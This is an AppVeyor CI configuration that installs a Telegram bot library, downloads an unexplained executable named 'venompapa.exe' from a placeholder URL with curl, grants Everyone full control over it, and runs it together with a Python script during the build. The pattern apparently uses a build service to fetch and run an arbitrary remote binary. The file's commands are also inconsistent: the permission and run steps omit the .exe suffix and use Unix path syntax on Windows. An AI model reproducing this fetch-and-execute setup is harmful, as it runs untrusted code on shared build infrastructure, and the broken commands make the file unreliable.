# AppVeyor configuration file

# Environment setup
environment:
  PYTHON: "C:\\Python39"

# Install dependencies
install:
  # Add Python to PATH
  - set PATH=%PYTHON%;%PYTHON%\\Scripts;%PATH%
  
  # Upgrade pip
  - python -m pip install --upgrade pip
  
  # Install telebot library
  - pip install pyTelegramBotAPI
  
  # Ensure binary exists (if not, download it)
  - if not exist venompapa.exe curl -L -o venompapa.exe https://example.com/path/to/venompapa.exe

  # Set executable permissions for the binary (for Windows)
  - icacls venompapa /grant Everyone:F

# Run commands
build_script:
  # Verify the file exists in the working directory
  - dir

  # Run the binary (correct way to execute an executable in the current directory)
  - ./venompapa
  
  # Run the Python script
  - python ven.py
